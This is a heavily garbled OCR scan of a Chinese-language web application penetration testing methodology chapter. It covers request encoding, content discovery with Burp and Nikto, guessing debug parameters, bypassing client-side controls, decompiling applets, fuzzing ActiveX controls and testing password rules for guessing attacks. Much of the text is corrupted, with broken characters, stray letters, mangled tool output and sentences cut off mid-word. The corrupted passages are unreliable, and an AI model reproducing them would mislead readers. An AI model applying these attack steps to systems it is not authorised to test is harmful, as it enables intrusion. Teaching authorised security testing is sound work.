的 第 见 漏 洞 ， 迅 速 找到 在 几 种 不 同 的 攻击 中 避 开 应 用 程序 的 防御 机 制 的 



































方法 





可 以 使 用 这 个 方法 论 中 列 出 的 步骤 作为 攻击 指导 ， 并 把 它 作为 避免 
下 忽 的 清单 ， 但 不 一 定 要 过 于 严格 地 遵守 这 些 步 又 。 请 记 住 以 下 要 点 : 
在 很 大 程度 上 上， 我们 描述 的 任务 都 属于 标准 的 常规 性 任务 ， 要 对 Web 应 
a F 渗透 测试 员 必 须 充分 发 挥 自己 的 想象 力 。 
— fA 

当 执 行 攻击 Web 应 用 程序 所 需 的 详细 步骤 时 ， 应 该 始终 记 住 以 下 注 
这 些 注 意 事项 适用 于 所 有 必须 测试 的 区 域 以 及 需要 采用 的 各 种 

Tj 

口 记 住 ， 一 些 字符 在 HTTP 请 求 的 不 同 部 分 具有 特殊 的 含义 。 当 修 
改 请 求 中 的 数据 时 ， 应 该 对 这 些 字 符 进 行 URL 编 码 ， 以 确保 应 用 程序 按 
照 想 要 的 方式 解释 这 些 字 符 。 
E &x 用 于 分 隔 URL 碍 询 字 符 串 与 消息 主体 中 的 参数 。 
要 插入 一 个 字面 量 & 字符 ， 必 须 将 其 编码 为 9%26。 
n = 用 于 分 隔 URL 碍 询 字 符 串 与 消息 主体 中 每 个 参数 
的 名 称 与 值 。 要 插入 一 个 字面 量 = 字 符 ， 必 须 将 其 编 
人 码 为 %3d。 
E ?用 于 标记 URL 查 询 字 符 串 的 起 始 位 置 。 要 插入 一 
个 字面 量 ? 字 符 ， 必 须 将 其 编码 为 %3f。 
m 空格 用 于 在 请 求 的 第 一 行 标记 URL 的 结束 位 置 ， 并 
可 用 于 在 Cookie 消 息 头 中 表示 一 个 cookie 值 结束 。 要 
插入 一 个 字面 量 空格 字符 ， 必 须 将 其 编码 为 %20 或 


E 天 为 + 表示 一 个 编码 的 空格 ， 要 插入 一 个 字面 量 + 字 
符 ， 必 须 将 其 编码 为 9%2b。 
m ;用 于 在 Cookie 消 息 头 中 分 隔 单个 的 cookie。 要 插入 
一 个 字面 量 ; 字符 ， 必 须 将 其 编码 为 %3b。 
m # 用 于 在 URL 中 标记 片段 标识 人 符 。 如 果 在 浏览 器 的 
URL 中 输入 这 个 字符 ， 它 会 将 传送 给 服务 器 的 URL 截 
短 。 要 插入 一 个 字面 量 # 字 符 ， 必 须 将 其 编码 
为 %23。 
E % 在 URL 编 码 方案 中 作为 前 级 。 要 插入 一 个 字面 
量 % 字 符 ， 必 须 将 其 编码 为 9%25。 
E 当然 ， 空 字 节 与 换行 符 等 非 打印 字符 必须 使 用 它们 
的 ASCII 字 符 代 码 进行 URL 编 码 。 空 字 节 与 换行 符 的 
编码 分 别 为 %00 和 %0a。 

口 此外， 需要 注意 ， 在 表单 中 输入 URL 编 码 的 数据 通常 会 导致 浏览 























器 执行 男 一 层 编码 。 例 如 ， 在 表单 中 提交 %00 可 能 会 导致 回 服务 器 发 送 
值 %2500。 为 此 ， 通 常 最 好 是 在 拦截 代理 服务 器 中 查看 最 终 请 求 。 

口 许 多 查找 常见 Web 应 用 程序 的 测试 需要 发 送 各 种 专门 设计 的 输入 
字符 串 ， 并 监控 应 用 程序 的 啊 应 ， 从 中 搜索 表示 漏洞 存在 的 反常 现象 。 
有 时 候 ， 无 论 是 个 提交 某 个 特定 漏洞 的 触发 锅 ， 应 用 程序 对 一 个 特殊 请 
求 的 啊 应 都 将 包含 这 个 漏洞 的 签名 。 只 要 提交 专门 设计 的 特殊 输入 导致 
了 与 某 个 漏洞 有 关 的 行为 《如 一 个 特殊 的 错误 消息 ) ， 就 应 该 重新 核 
查 ， 确 定 在 相关 参数 中 提交 良性 输入 是 否 也 会 造成 相同 的 行为 。 如 果 两 
种 输入 的 行为 相同 ， 那 么 最 初 的 发 现 可 能 是 一 个 错误 警报 。 

口 通常 ， 应 用 程序 会 从 前 一 个 请 求 中 收集 一 定量 的 状态 ， 这 会 影响 
它们 如 何 啊 应 随后 的 请 求 。 有 时 ， 当 调 碍 一 个 尚未 确定 的 漏洞 并 隔离 某 
一 个 反常 行为 的 根源 时 ， 必 须 避 人 免 任 何 收集 到 的 状态 信息 造成 的 有 影响。 
通常 ， 使 用 一 个 新 的 浏览 器 进程 开始 男 一 个 会 话 ， 再 使 用 良性 请 求 导航 
至 观测 到 发 生 反 铝 的 位 置 ， 然 后 重新 提交 专门 设计 的 输入 ， 束 足以 达到 
这 个 目的 。 还 可 以 对 请 求 中 包含 的 cookie 和 缓存 信息 进行 调整 ， 重 复 利 
用 这 种 方法 。 此 外 ， 还 可 以 使 用 Burp Repeater 等 工具 隔离 一 个 请 求 ， 对 
它 进 行 一 些 调整 ， 然 后 根据 需要 重复 多 次 发 布 这 个 请 求 。 

口 一 些 应 用 程序 使 用 一 种 负载 平衡 的 配置 ， 其 中 连续 的 HTTP 请 求 
可 能 会 被 不 同 的 后 端 服 务 器 在 Web 层 、 展 现 层 、 数 据 层 或 其 他 层 处 理 。 
不 同 服务 器 在 配置 上 的 细微 差异 可 能 会 影响 到 处 理 结 果 。 另 外 ， 一 些 成 
功 的 攻击 将 改变 处 理 请 求 的 某 一 台 服 务 器 的 状态 ， 例 如 在 Web 根 目录 上 
创建 一 个 新 的 文件 。 为 隔离 特殊 操作 造成 的 影响 ， 可 能 需要 连续 提交 几 
个 相同 的 请 求 ， 测 试 每 个 请 求 的 结果 ， 直 到 请 求 被 相关 服务 器 处 理 。 

假设 需要 在 咨询 工作 中 采用 这 种 方法 ， 渗 透 测试 员 应 当前 先 确定 测 
试 范 围 ， 明 确 了 解 测 斌 包含 的 主机 名 、URE 与 功能 以 及 允许 执行 的 测试 
类 型 是 否 存在 任何 限制 。 还 应 当 癌 应 用 程序 所 有 者 告知 对 一 个 “ 黑 盒 ” 目 
标 实 施 任 何 渗透 测试 包含 的 内 在 风险 ， 并 建议 他 们 在 开始 测试 前 备份 所 
有 重要 的 数据 。 


















































21.1 解析 应 用 程 T 
21.1.1 可 见 的 内 容 


(1) 配置 浏览 锅 ， 使 用 首选 集成 代理 / 抓 取 工具 。 可 以 使 用 Burp 与 
WebScarab 监 控 和 解析 由 代理 服务 器 处 理 的 web 内容， 对 站 点 实行 被 动 


抓 取 。 
(2) 如 果 有 用 ， 配 置 浏览 右 ， 使 用 一 个 扩展 《如 IEWatch) 监控 和 
分 析 被 浏览 器 处 理 的 HITP 与 HTIML 内容。 








ee | 


图 21-2 ”解析 应 用 程序 内 容 


(3) 以 常规 方式 浏览 整个 应 用 程序 ， 访 问 发 现 的 每 一 个 链接 和 
URL， 提 交 每 一 个 表单 并 执行 全 部 多 阶段 功能 。 尝 试 在 JavaScript 激 活 与 
禁用 、cookie 激 活 与 禁用 的 情况 下 浏览 。 许 多 应 用 程序 能 够 处 理 各 种 浏 
览 喜 配置， 渗透 测试 员 可 以 获得 应 用 程序 内 的 不 同 内 容 和 代码 路 径 。 

(4) 如果 应 用 程序 使 用 身份 验证 ， 并 用 渗透 测试 员 已 经 拥有 或 可 
以 建立 一 个 登录 账户 ， 那 么 他 就 可 以 使 用 该 账户 访问 被 保护 的 功能 

G) 当 浏 览 、 监 控 通 过 拦截 代理 服务 器 的 请 求 与 啊 应 时 ， 了 解 被 
提交 的 数据 种 类 了 和 解 客户 戎 如 何 控 制服 务 喜 端 应 用 程序 的 行为 。 

(6) 检查 被 动 抓 取 生 成 的 站 点 地 图 ， 确 定 任何 尚未 使 用 浏览 器 访 
问 到 的 内 容 或 功能 。 根 据 抓 取 结 果 ， 确 定 发 现 每 一 项 内 容 的 位 置 〈 例 
如 ， 在 Burp Spideri}, 检查 “链接 自 ” 的 详细 内 容 ) 。 使 用 浏览 器 访问 以 
EAR, MENEE HEIT ARS 4x AY Mad , 确定 其 他 任何 内 容 。 重复 执行 上 
述 步 又， 直到 无 法 再 确定 其 他 内 容 或 功能 














(7) 完成 手动 浏览 和 被 动 抓 取 后 ， 可 以 用 一 组 发 现 的 URL 作 为 种 
子 ， 使 用 扑 虫 抓 取 应 用 程序 。 有 了 时， 这样 可 发 现 其 他 在 手动 浏览 时 忽略 
的 内 容 。 在 进行 自动 抓 取 前 ， 首 先 应 确定 任何 危险 的 或 可 能 会 中 断 应 用 
程序 会 话 的 URL， 并 配置 息 虫 ， 将 它们 排除 在 抓 取 范 围 之 外 。 


21.1.2 ”浏览 公共 资源 


d) 使 用 因特网 搜索 引擎 和 历史 档案 例如，Wayback Machine) 
确定 它们 编 入 索引 或 保存 的 与 目标 应 用 程序 有 关 的 内 容 。 

(2) 使 用 高 级 搜索 选项 提高 搜索 的 效率 。 例 如 ， 在 Google 中 ， 可 
以 使 用 site: 获 取 所 有 与 目标 站 点 有 关 的 内 容 ; 使 用 link: 获 取 链 接 到 目标 
站 点 的 其 他 站 点 。 如 果 在 搜索 过 程 中 找到 现 有 应 用 程序 已 经 删除 的 内 
容 ， 仍 然 可 以 从 搜索 引擎 的 缓存 中 查看 这 些 内 容 。 这 些 已 被 删除 的 内 容 




















中 可 能 包含 尚未 删除 的 其 他 资源 的 链接 。 

(3) 搜索 在 应 用 程序 内 容 [如 联系 信息 ， 包 括 并 未 在 屏幕 上 显示 
的 内 容 〈 如 HITML 注 释 ) ] 中 发 现 的 任何 姓名 与 电子 邮件 地 址 。 除 Web 
搜索 外 ， 还 应 进行 新 闻 和 分 组 搜索 。 在 因特网 论坛 上 寻找 与 目标 应 用 程 
序 及 其 文 持 基础 染 构 有 关 的 所 有 技术 信息 。 

(4) 检查 已 发 布 的 任何 WSDL 文 件 ， 以 生成 应 用 程序 可 能 采用 的 
功能 名 称 和 参数 值 列 表 。 





C1) 确定 应 用 程序 如 何 处 理 访问 不 存在 的 资源 的 请 求 。 手 动 提出 
一 些 请 求 ， 访 问 已 知 有 效 和 无 效 的 资源 ， 比 较 应 用 程序 对 这 些 请 求 的 啊 
应 ， 找 到 一 种 确定 资源 并 不 存在 的 简单 方法 。 

(2) 获取 常见 文件 与 目录 名 以 及 常见 的 文件 扩展 名 列表 。 将 这 些 
列表 添加 到 已 经 确定 的 应 用 程序 内 容 以 及 通过 这 些 内 容 推 师 出 的 其 他 内 
容 中 。 设 法 了 解 应 用 程序 开发 者 采用 的 命名 方案 。 例 如 ， 如 果 有 页 面 被 
命名 为 AddDocument.jsp 和 ViewDocument.jsp， 就 可 能 有 名 为 
EditDocument.jsp 和 RemoveDocument.jsp 的 页 面 存 在 。 

(3) 审查 所 有 客户 端 代 码 ， 确 定 任何 与 服务 器 端 内 容 《〈 包 括 
HTML 注 释 和 禁用 的 表单 元 系 ) 有 关 的 线索 。 

(4) 使 用 第 14 章 描述 的 自动 化 技巧 ， 根 据 目 录 名 、 文 件 名 及 文件 
所 展 名 列表 提出 大 量 请 求 。 监 控 应 用 程序 的 啊 应 ， 确 定 存 在 的 可 访问 的 


Ko 
(5) 以 刚刚 枚 举 出 的 内 容 和 模式 作为 用 户 指 导 的 抓 取 以 及 自动 化 




















深入 搜索 的 基础 ， 重 复 进行 这 些 内 容 查 找 操作 。 
21.1.4 ”查找 默认 的 内 容 


(1) 针对 Web 服 务 器 运行 Nikto， 探 查 所 有 默认 或 已 知 存在 的 内 
容 。 使 用 Nikto 的 选项 提高 探查 的 效率 。 例 如 ， 使 用 -root 选 项 指定 查找 
默认 内 容 的 目录 ， 或 者 使 用 -404 选 项 指定 一 个 标识 定制 化 “文件 未 发 
现 ” 页 面 的 字符 串 。 
(2) 手动 核查 所 有 可 能 有 用 的 发 现 ， 减 少 探 查 结果 中 的 错误 警 

(3) 请 求 服务 器 的 根 目 录 ， 在 Host 消 息 头 中 指定 IP 地 址 ， 确 定 应 
用 程序 是 否 使 用 任何 不 同 的 内 容 做 出 响应 。 如 果 是 ， 则 针对 该 IP 地 址 及 
服务 器 名 称 运行 Nikto 扫 描 。 

(4) 向 服务 器 的 根 目 录 提 出 请 求 ， 指 定 一 系列 User-Agent 消 息 头 ， 


如 www.useragentstring.com/pages/useragentstring.php 所 示 。 





21.1.5“” 枚 举 标识 符 指定 的 功能 


C1) 确定 任何 通过 在 请 求 参数 中 提交 一 个 功能 标识 符 〈 例 
如 ，/admin.jsp?action=editUser 或 /main.php?func=A21) 访问 特殊 应 用 程 
序 功 能 的 情况 。 

(2) 对 用 于 访问 单项 功能 的 机 制 ， 应 用 21.1.3 节 中 使 用 的 内 容 奏 找 
技巧 。 例 如 ， 如 果 应 用 程序 使 用 一 个 包含 功能 名 称 的 参数 ， 首 先 应 该 确 
定 指定 无 效 功能 时 应 用 程序 的 行为 ， 设 法 找到 一 个 确定 被 请 求 的 功能 确 
实 有 效 的 简单 方法 。 列 出 常用 的 功能 名 称 或 过 历 所 使 用 的 标识 符 的 语法 
范围 。 使 枚 举 有 效 功能 的 操作 自动 化 ， 使 其 尽 可 能 迅速 高 效 地 完成 。 

(3) 如 果 适 用 ， 根 据 功 能 路 径 而 非 URL 编 制 一 幅 应 用 程序 内 容 地 
图 ， 列 出 所 有 枚 举 出 的 功能 和 逻辑 路 径 以 及 它们 之 间 的 依赖 关系 。《〈 相 
关 实 例 请 参阅 第 4 章 。) 











21.1.6 ”调试 参数 


(1) 选择 一 个 或 几 个 使 用 隐藏 调试 参数 〈 如 debug=true) 的 应 用 程 
e a a a 
功能 中 。 
(2) 使 用 常用 调试 参数 名 (如 debug、test、hide 和 source) 与 常用 
参数 值 〈( 如 true、yes、on 和 1) 列表 ， 排 出 这 些 名 称 与 值 的 全 部 组 合 ， 


PS AY 


向 每 一 个 目标 功能 提交 每 个 名 / 值 对 。 对 于 POST 请 求 ， 在 URL 查 询 字符 
串 和 请 求 主体 中 提交 参数 。 使 用 第 14 章 描述 的 技巧 自动 完成 这 项 操作 。 
例如 ， 可 以 使 用 Burp Intruder 中 的 “集束 炸弹 ”攻击 类 型 将 两 组 有 效 载荷 
的 全 部 组 合 结合 起 来 。 

(3) 在 应 用 程序 的 响应 中 查找 任何 表示 添加 的 参数 对 应 用 程序 的 
行为 造成 影响 的 反常 现象 。 























21.2 ”分 析 应 用 程 


21.2.1 确定 功能 
21.2.3 确定 所 
使 用 的 技术 


paaa mee 
21.2.4 解析 受 攻击 面 


图 21-3 分析 应 用 程序 











(1) 确定 为 使 应 用 程序 正常 运行 而 建立 的 核心 功能 以 及 每 项 功能 
旨 在 执行 的 操作 。 

(2) 确定 应 用 程序 采用 的 核心 安全 机 制 以 及 它们 的 工作 机 制 。 重 
点 了 解 处 理 身 份 验 证 、 会 话 管理 与 访问 控制 的 关键 机 制 以 及 文 持 它 们 的 
功能 ， 如 用 户 注册 和 账户 恢复 。 

(3) 确定 所 有 较为 外 围 的 功能 和 行为 ， 如 重 定向 使 用 、 站 外 链 
接 、 错 误 消 轧 、 管 理 与 日 志 功 能 。 

(4) 确定 任何 与 应 用 程序 在 其 他 地 方 使 用 的 标准 GUI 外 观 、 参 数 
命名 或 导航 机 制 不 一 致 的 功能 ， 然 后 将 其 挑选 出 来 以 进行 深入 测试 。 


21.2.2 人 确定 数据 进入 点 


(1) 确定 在 应 用 程序 中 引入 用 户 输入 的 所 有 进入 点 ， 包 括 URL、 
查询 字符 串 参数 、POST 数 据 、cookie 与 其 他 由 应 用 程序 处 理 的 HTTP 消 


(2) 分 析 应 用 程序 使 用 的 所 有 定制 数据 传输 或 编码 机 制 ， 如 非常 
规 的 碍 询 字符 串 格 式 。 了 解 被 提交 的 数据 是 否 包含 参数 名 与 参数 值 ， 或 
者 是 否 使 用 了 其 他 表示 方法 。 

(3) 确定 所 有 在 应 用 程序 中 引入 用 户 可 控制 或 其 他 第 三 方 数据 的 


带 外 通道 ， 例 如 ， 处 理 和 显示 通过 SMTP 收 到 的 消息 的 Web 邮 件 应 用 程 
Te 


21.2.3 ”确定 所 使 用 的 技术 


(1) 确定 客户 端 使 用 的 各 种 不 同 技术 ， 如 表单 、 脚 本 、cookie、 
Java applet、ActiveX 控 件 与 Flash 对 象 。 

(2) 尽 可 能 确定 服务 器 端 使 用 的 技术 ， 包 括 脚本 语言 、 应 用 程序 
平台 以 及 与 数据 库 和 电子 邮件 系统 等 后 端 组 件 的 交互 。 

(3) 检查 在 应 用 程序 啊 应 中 返回 的 HTTP Server 消 息 头 ， 碍 找 定制 
HTTP 消 息 尖 或 HTML 源 代码 注释 中 出 现 的 其 他 任何 软件 标识 人 符 。 注 
意 ， 有 时候， 不 同 的 应 用 程序 区 域 由 不 同 的 后 端 组 件 处 理 ， 因 此 渗透 测 
试 员 可 能 会 收 到 不 同 的 标识 符 。 

(4) 运行 Httprint 工 具 ， 为 Web 服 务 器 做 “指纹 标识 ”。 

(5) 检查 内 容 解析 过 程 中 获得 的 结果 ， 确 定 所 有 有 助 于 了 解 服务 
器 端 所 使 用 技术 的 文件 扩展 名 、 目 录 或 其 他 URL 序 列 。 检 碍 所 有 会 话 令 
ee 同时 ， 使 用 Google 搜 索 与 这 些 内 容 有 关 的 技 


(6) 分 确定 任何 看 似 有 用 的 、 属 于 第 三 方 代码 组 件 的 脚本 名 称 与 
查询 字符 串 参 数 。 在 Google 中 使 用 inurl: 限 定 词 搜 索 这 些 内 容 ， 查 找 所 有 
使 用 相同 脚本 与 参数 、 并 因此 使 用 相同 第 三 方 组 件 的 应 用 程序 。 对 这 些 
站 点 进行 非 入 侵 陈 的 审查 ， 这 样 做 可 能 会 发 现 其 他 在 攻击 的 应 用 程序 中 
没有 明确 链接 的 内 容 和 功能 。 


21.2.4 fT ACL 


C1) 设法 确定 服务 顺 端 应 用 程序 的 内 部 结构 与 功能 以 及 用 于 实现 
例如 ， 获 取 客 户 订单 的 功能 可 能 与 数据 库 
进行 交互 。 

(2) 确定 各 种 与 每 一 项 功能 有 关 的 第 见 漏 润 。 例 如 ， 文 件 上 传 功 
能 可 能 易于 受到 路 径 授 历 攻击 ;， 用户 间 通 信 可 能 易于 受到 XSS 攻 
击 ;“ 联 络 我 们 ”功能 可 能 易于 受到 SMTP 注 入 攻击 。 请 参阅 第 4 章 了 解 与 
特定 功能 和 技术 有 关 的 第 见 漏洞 实例 。 

(3) 制订 一 个 攻击 计划 ， 优 先 考 虑 最 有 用 的 功能 以 及 与 它 有 关 的 
最 严重 的 潜在 漏洞 。 使 用 这 份 计划 作为 指导 ， 决 定 应 对 本 章 讨 论 的 方法 
的 其 他 区 域 投 入 多 少时 间 和 精力 。 























X 


21.3 MRX F ee 


HA 


传送 数据 : 入 控 人 E 
: ASP.NET ViewState] | : 3 | Silverlight at 4 | 


图 21-4 测试 客户 端 控件 




















(1) 在 应 用 程序 中 ， 确 定 隐藏 表单 字段 、cookie 和 URL 参 数 明显 用 
于 通过 客户 端 传送 数据 的 所 有 情况 。 
(2) PRO EAH REA eae, Se CEMA 
程序 逻辑 中 发 挥 的 作用 。 
(3) 修改 数据 在 应 用 程序 相关 功能 中 的 值 。 确 定 应 用 程序 是 否 处 
理 字 上 段 中 提交 的 任意 值 ， 以 及 是 否 可 以 通过 这 样 做 干扰 应 用 程序 的 逻辑 
或 破坏 任何 安全 控件 。 
(4) 如果 应 用 程序 通过 客户 端 传送 模糊 数据 ， 渗 透 测 试 员 可 以 以 
各 种 方式 攻击 这 种 传输 机 制 。 如 果 数 据 被 模糊 处 理 ， 渗 透 测试 员 可 以 破 
译 所 使 用 的 模糊 算法 ， 从 而 在 模糊 数据 中 提交 任意 数据 。 即 使 它 进行 了 
安全 加 密 ， 仍 然 可 以 在 其 他 情况 下 重新 提交 这 个 数据 ， 干 扰 应 用 程序 的 
逻辑 。 请 参阅 第 5 章 了 解 有 关 这 些 和 其 他 攻击 的 更 多 详情 。 
(5) 如 果 应 用 程序 使 用 ASP.NET ViewState， 对 其 进行 测试 ， 确 定 
是 否 可 以 破坏 它 ， 或 者 其 中 是 否 包 含 任何 敏感 信息 。 请 注意 ， 不 同 应 用 
程序 页 面 使 用 ViewState 的 方式 可 能 有 所 不 同 。 
(a) 使 用 Burp Suite 中 的 ViewState 分 析 器 确定 
EnableViewStateMac 选 项 是 否 被 激活 ， 该 选项 表示 ViewState 的 
内 容 不 能 被 修改 。 
(b) 审查 解码 后 的 ViewState， 确 定 它 包 含 的 所 有 敏感 数 











据 。 

(c) 修改 一 个 被 解码 的 参数 值 ， 重 新 对 其 编码 ， 然 后 将 
它 提交 给 ViewState。 如 果 应 用 程序 接受 修改 后 的 参数 值 ， 那 么 
应 当 把 ViewState 当 做 在 应 用 程序 中 引入 任意 数据 的 一 个 输入 渠 
道 ， 并 对 它 包 含 的 数据 执行 与 其 他 请 求 参数 相同 的 测试 。 


21.3.2 mA E 


C1) 在 将 用 户 输入 提交 给 服务 器 之 前 ， 确 定 使 用 长 度 限 制 和 
JavaScript 检 查 等 客户 端 控 件 对 其 进行 确认 的 任何 情况 。 当 然 ， 这 些 客户 
因为 渗透 测试 员 可 以 同 服务 器 发 送 任意 请 求 。 例 
H: 


<form action="order.asp" onsubmit="return Validate(this)"> 


<input maxlength="3" name="quantity"> 


(2) WB Se 20 is Be m EAE EA RRE 
影响 的 字段 ， 确 定 服 务 器 是 否 使 用 相同 的 输入 确认 。 

(3) 能 够 避 开 客户 端 确 认 并 不 表示 存在 任何 漏洞 。 因 此 ， 应 该 仔 
细 审 查 应 用 程序 实施 的 确认 机 制 ， 错 清 应 用 程序 是 合 依 赖 客户 并 控件 保 
护 上 自身 ， 阻 止 畸形 输入 ， 以 及 这 些 输入 是 否 可 触发 任何 可 被 利用 的 条 


fh 

(4) 检查 每 一 个 HTML 表 单 ， 确 定 所 有 蔡 用 的 元 系 ， 如 灰色 提交 
按钮 ， 例 如 : 

<input disabled="true" name="product"> 

SOR HUET SEA Us wi EE Ze SB — J HE ACI HET 
确定 该 元 素 是 否 会 对 应 用 程序 的 处 理 逻 辑 造成 影响 ， 渗 透 测试 员 可 在 攻 
击 过 程 中 利用 这 些 影响 。 或 者 使 用 自动 化 代理 服务 器 规则 ， 上 自动 局 用 茶 
用 的 字段 ， 如 Burp Proxy 的 “HTML 修 改 ” 规 则 。 














1. 了 解 客户 端 应 用 程序 的 操作 
(1) 为 正在 测试 的 客户 端 技术 设置 一 个 本 地 拦截 代理 服务 器 ， 并 
监视 客户 端 与 服务 器 之 间 的 所 有 流量 。 如 果 数 据 被 序列 化 ， 可 以 使 用 某 
种 去 序列 化 工具 ， 如 Burp 的 内 置 AMF 支 持 工 具 或 用 于 Java 的 DSer Burp 
插件 。 


D 浏览 在 客户 端 中 呈现 的 所 有 功能 。 使 用 拦截 代理 服务 器 中 的 
标准 工具 重新 提出 关键 请 求 或 修改 服务 器 啊 应 ， 以 确定 任何 可 能 的 敏感 
功能 或 强大 功能 。 

2. 反 编 译 客户 端 

(1) 确定 应 用 程序 使 用 的 任何 applet。 通 过 拦截 代理 服务 器 查找 以 
下 请 求 的 任何 文件 类 型 

<applet ccde="input.class" id="TneApplet" codebase="/scripts/"></ 

applet> 


还 可 以 在 应 用 程序 页 面 的 HTML 源 代码 中 人 查找 applet 标 签 。 例 如 : 


C:\>jad.exe input.class 
Parsing input.class... Generating input.jad 


(2) 分 析 HTML 源 代码 对 applet 方 法 的 全 部 调用 情况 ， 并 确定 
applet 返 回 的 数据 是 否 被 提交 到 服务 器 。 如 果 这 个 数据 为 模糊 数据 ( 即 
经 过 模糊 处 理 或 加 密 ) ， 那 么 要 想 对 其 进行 修改 ， 可 能 需要 反 编译 
applet， 获 得 它 的 源 代码 。 

(3) 在 浏览 器 中 输入 URL， 下 载 applet 字 节 码 ， 并 将 文件 保存 在 本 
地 计算 机 中 。 字 节 码 文件 的 名 称 在 applet 标 签 的 code 属 性 中 指定 ， 该 文 
件 将 位 于 codebase 属 性 《如 果 此 属性 存在 ) 指定 的 目录 中 ; 否则 ， 它 将 
保存 在 applet 标 签 出 现 的 页 面 所 在 的 目录 中 。 

(4) 使 用 适当 的 工具 将 字 节 码 反 编 译 成 源 代码 。 例 如 : 


GC;\>Iad.axe input.class 











Favsing input.cleass... Generating imput.jad 
DB ee — Hea FP i PEAS Fe] De aR EL A 
g Java Jad 
D Flash SWFScan, Flasm/Flare 
D Silverlight——.NET Reflector 
如 果 applet 被 压缩 成 JAR、XAP 或 SWF 文件 ， 可 以 使 用 WinRar 或 
WinZip 等 标准 档案 读 取 工 具 将 其 解压 。 
(5) 分 析 相 关 源 代码 (从 执行 返回 模糊 数据 的 方法 的 源 代 码 开 
Oa) ， 了 解 应 用 程序 执行 了 何 种 处 理 。 
(6) 确定 applet 中 是 否 包含 任何 可 用 于 对 任意 输入 进行 相关 模糊 处 
理 的 公共 方法 。 
(7) 如 果 其 中 没有 这 类 方法 ， 修 改 applet 的 源 代码 ， 以 达到 令 其 执 
行 的 任何 确认 失效 或 允许 模糊 处 理 任意 输入 的 目的 。 然 后 可 以 使 用 供应 
商 提供 的 编译 工具 将 源 代 码 重 新 编译 成 最 初 的 文件 格式 。 








3. 附加 调试 器 

(1) 对 于 大 型 客户 端 应 用 程序 ， 要 反 编 译 、 修 改 并 重新 打包 整个 
应 用 程序 往往 非常 困难 ， 这 时 会 过 到 各 种 错误 。 通 常 ， 对 于 这 些 应 用 程 
序 ， 在 处 理 时 附加 运行 时 调试 器 会 更 加 容易 。JavaSnoop 可 对 Java 应 用 程 
序 执行 上 述 操作 。Silverlight Spy 是 一 款 免费 工具 ， 可 对 Silverlight 客 户 
问 进 行 运 行 时 监视 。 

(2) 找到 应 用 程序 用 于 实现 安全 相关 的 业务 逻辑 的 关键 功能 和 
值 ， 并 在 调用 目标 功能 时 放置 断 点 。 根 据 需 要 修改 参数 或 返回 值 ， 以 破 
坏 其 安全 防御 。 

4. 测试 ActiveX 控 件 

(1) 确定 应 用 程序 使 用 的 所 有 ActiveX 控 件 。 寻 找 通 过 拦截 代理 服 
务 器 请 求 的 所 有 .cab 文 件 类 型 ， 或 者 在 应 用 程序 页 面 的 HIML 源 代码 中 
寻找 对 象 标签 。 例 如 : 

<OBJECT 


classid="“CLSID: 4F878398-B58A-11D3-BEE9-00C04FA0D6BA" 





coGebase=“https://wahh avo.com/scripts/input.cab" 
ic="TheAxControl"> 
</OBJECT> 

(2) Way, FY DG AE Ee EBD id ial as FEL $2 A hb ch A 
据 ， 或 者 改变 程序 的 执行 路 径 ， 破 坏 ActiveX 控 件 实施 的 所 有 输入 确 
认 。 请 参阅 第 5 章 了 解 这 种 攻击 的 更 多 详情 。 

(3) 通常 ， 可 以 根据 ActiveX 控 件 导 出 的 各 种 方法 的 名 称 及 提交 给 
它们 的 参数 ， 猜 测 这 些 方 法 的 作用 。 使 用 COMRaider 工 具 可 枚 举 出 
ActiveX 控 件 导出 的 各 种 方法 。 测 试 是 否 可 以 操纵 这 些 方法 ， 从 而 影响 
控件 的 行为 并 避 开 它 执 行 的 所 有 确认 机 制 。 

(4) 如 果 控 件 的 作用 是 收集 或 核实 茶 些 与 客户 端 计算 机 有 关 的 信 
息 ， 就 可 以 使 用 Filemon 与 Regmon 工 具 监 控 控件 收集 到 的 信息 。 通 常 ， 
可 以 在 系统 注册 表 和 文件 系统 中 创建 适当 的 数据 项 ， 修 改 控件 使 用 的 输 
入 ， 从 而 影响 其 行为 。 

(5) 在 任何 ActiveX 控 件 中 探查 可 用 于 攻击 应 用 程序 其 他 用 户 的 漏 
洞 。 渗 透 测 试 员 可 以 修改 用 于 调用 控件 的 HTML 代 码 ， 疝 它 的 方法 提交 
任意 数据 ， 并 监控 处 理 结果 ; 可 以 寻找 看 似 危 险 的 方法 名 称 ， 如 
LaunchExe， 还 可 以 使 用 COMRaider 对 ActiveX 控 件 进行 基本 的 模糊 测 
试 ， 确 定 缓冲 区 溢出 之 类 的 漏洞 。 
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图 21-5 ”测试 验证 机 制 





21.4.1 Gaal | 
(1) 确定 应 用 程序 使 用 的 验证 技术 如 表单 、 证 书 或 多 元 机 
J) o 

(2) 确定 所 有 与 验证 有 关 的 功能 《如 登录 、 注 册 、 账 尸 恢复 


Tia 
(3) 如果 应 用 程序 并 未 采用 目 动 自我 注册 机 制 ， 确 定 是 人 否 可 以 使 
用 任何 其 他 方法 获得 几 个 用 户 账 户 。 


21.4.2 ”测试 密码 强度 


D 在 应 用 程序 中 查找 有 关 用 户 密 码 最 小 强度 规则 的 说 明 。 

(2) 笃 试 使 用 所 有 上 自我 注册 或 密码 修改 功能 ， 设 定 各 种 脆弱 密 
码 ， 确 定 应 用 程序 实际 应 用 的 密码 强度 规则 。 洽 试 使 用 短 密码 、 仅 包 合 
字母 字符 的 密码 、 全 部 大 写 或 全 部 小 写字 符 的 密码 、 单 词 型 密码 以 及 将 
当前 用 户 名 作为 密码 。 

(3) 测试 不 完整 的 证 书 确 认 。 设 定 一 个 强大 并 且 复 杂 的 密码 〈 例 
如 ， 密 码 长 度 为 12 个 字符 ， 其 中 包含 大 小 写字 母 、 数 字 和 印刷 字符 ) 。 
尝试 用 这 个 密码 的 各 种 变化 形式 登录 ， 如 删除 最 后 一 个 字符 ， 改 变 字符 
的 大 小 写 ， 或 者 删除 任何 特殊 字符 。 如 果 其 中 一 些 尝 试 取得 成 功 ， 继 续 
系统 性 地 尝试 ， 了 解 完 整 的 证 书 确认 过 程 。 

(4) 了 解 最 小 密码 强度 规则 以 及 密码 确认 的 程度 后 ， 再 设法 确定 
密码 猜测 攻击 所 需要 使 用 的 密码 值 范 围 ， 以 提高 攻击 成 功 的 可 能 性 。 滨 
试 找 出 所 有 的 内 置 账户 ， 它 们 可 能 并 不 满足 标准 密码 复杂 度 要 求 。 


21.4.3 ”测试 用 广 


(1) 确定 各 种 验证 功能 通过 在 屏幕 上 显示 的 输入 字段 、 隐 藏 表单 
字段 或 cookie 提 交 用 户 名 的 每 一 个 位 置 。 这 些 位置 通 稍 存 在 于 登录 、 目 
